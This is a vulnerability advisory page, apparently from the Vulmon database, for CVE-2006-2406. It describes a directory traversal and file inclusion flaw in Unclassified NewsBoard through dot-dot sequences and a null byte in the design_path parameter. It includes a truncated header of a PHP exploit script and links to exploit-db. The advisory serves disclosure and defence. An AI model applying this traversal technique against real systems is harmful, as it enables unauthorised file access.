Published: 16/05/2006 Updated: 05/09/2008

CVSS v2 Base Score: 2.6 | Impact Score: 2.9 | Exploitability Score: 4.9

VMScore: 265

Vector: AV:N/AC:H/Au:N/C:N/I:P/A:N

Directory traversal vulnerability in bb_lib/abbc.css.php in Unclassified NewsBoard (UNB) 1.5.3-d and possibly earlier versions, when register_globals is enabled, allows remote malicious users to include arbitrary files via .. (dot dot) sequences and a trailing null byte (%00) in the design_path parameter. NOTE: this is closely related, but a different vulnerability than the ABBC[Config][smileset] parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
unclassified newsboard unclassified newsboard

#!/usr/bin/php -q -d short_open_tag=on <? echo "Unclassified NewsBoard <= 161 patch 1 ABBC[Config][smileset] arbitrary\r\n"; echo "local inclusion\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n"; /* 153 patch lev ...

NVD-CWE-Other http://newsboard.unclassified.de/forum/post/6499 http://attrition.org/pipermail/vim/2006-May/000769.html http://www.osvdb.org/25494 https://nvd.nist.gov https://www.exploit-db.com/exploits/1777/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-2406

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect